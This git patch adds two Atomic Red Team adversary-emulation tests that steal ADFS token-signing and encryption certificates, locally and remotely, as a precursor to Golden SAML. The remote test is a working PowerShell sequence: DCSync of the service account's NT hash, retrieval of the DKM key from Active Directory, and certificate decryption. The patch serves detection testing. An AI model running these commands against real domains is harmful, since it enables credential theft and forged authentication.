From 0fd43a3d6314e7f3a78f0695950f97a25a8f24bd Mon Sep 17 00:00:00 2001
From: piaconsigny <pia.consigny@epita.fr>
Date: Thu, 19 Aug 2021 11:20:48 +0200
Subject: [PATCH] add adfs certificates theft

---
 atomics/T1552.004/T1552.004.yaml | 96 ++++++++++++++++++++++++++++++++
 1 file changed, 96 insertions(+)

diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index 431e5b0c..a1129a9b 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -103,3 +103,99 @@ atomic_tests:
     cleanup_command: |
       rm -rf #{output_folder}
     name: sh
+- name: ADFS token signing and encryption certificates theft - Local
+  auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+  description: |
+    Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+    Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals module must be installed.
+    prereq_command: |
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module AADInternals -Force
+      Export-AADIntADFSCertificates
+      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+      Write-Host "`nCertificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+- name: ADFS token signing and encryption certificates theft - Remote
+  auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+  description: |
+    Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+    Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    adfs_service_account_name:
+      description: Name of the ADFS service account
+      type: String
+      default: "adfs_svc"
+    replication_user:
+      description: Username with replication rights. It can be the Domain Admin running the script
+      type: String
+      default: "Administrator"
+    replication_password:
+      description: Password of replication_username
+      type: String
+      default: "ReallyStrongPassword"
+    adfs_server_name:
+      description: Name of an ADFS server
+      type: String
+      default: "sts.contoso.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals and ActiveDirectory modules must be installed.
+    prereq_command: |
+      if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force 
+      Import-Module AADInternals -Force | Out-Null
+      #Get Configuration
+      $dcServerName = (Get-ADDomainController).HostName
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
+      $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+      # use DCSync to fetch the ADFS service account's NT hash
+      $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
+      $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+      # Get certificates decryption key
+      $Configuration = [xml]$ADFSConfig
+      $group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
+      $container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
+      $parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
+      $base = "LDAP://CN=$group,$container,$parent"
+      $ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
+      $ADSearch.Filter = '(name=CryptoPolicy)'
+      $ADSearch.PropertiesToLoad.Clear()
+      $ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
+      $aduser = $ADSearch.FindOne()
+      $keyObjectGuid = $ADUser.Properties["displayName"] 
+      $ADSearch.PropertiesToLoad.Clear()
+      $ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
+      $ADSearch.Filter="(l=$keyObjectGuid)"
+      $aduser=$ADSearch.FindOne() 
+      $key=[byte[]]$aduser.Properties["thumbnailphoto"][0] 
+      # Get encrypted certificates from configuration and decrypt them
+      Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
+      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+      Write-Host "`nCertificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+
+